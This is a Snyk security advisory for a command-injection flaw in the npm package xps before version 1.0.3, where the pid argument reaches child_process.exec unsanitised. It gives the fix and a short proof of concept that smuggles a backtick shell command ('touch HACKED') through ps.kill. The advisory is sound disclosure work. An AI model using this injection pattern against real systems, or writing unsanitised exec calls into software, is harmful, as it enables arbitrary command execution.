Command Injection Affecting xps package, versions <1.0.3


0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-XPS-590098
  • published 24 Jul 2020
  • disclosed 23 Jul 2020
  • credit d3lla

Introduced: 23 Jul 2020

CVE NOT AVAILABLE CWE-78 Open this link in a new tab

How to fix?

Upgrade xps to version 1.0.3 or higher.

Overview

xps is a cross-platform library for listing and killing processes.

Affected versions of this package are vulnerable to Command Injection. The argument pid is used to build the command that is passed to the child_process.exec function without any sanitization.

PoC by Alessio (d3lla)

  1. create a directory for testing

    mkdir poc
    cd poc/
    
  2. install latest vulnerable xps module (v1.0.2): npm i xps@1.0.2

  3. create the following PoC JavaScript file (poc.js):

    const ps = require('xps');
    ps.kill('`touch HACKED;`').fork();
    
  4. make sure that the HACKED file does not exist: ls

  5. execute the poc.js file: node poc.js

  6. the HACKED file is created: ls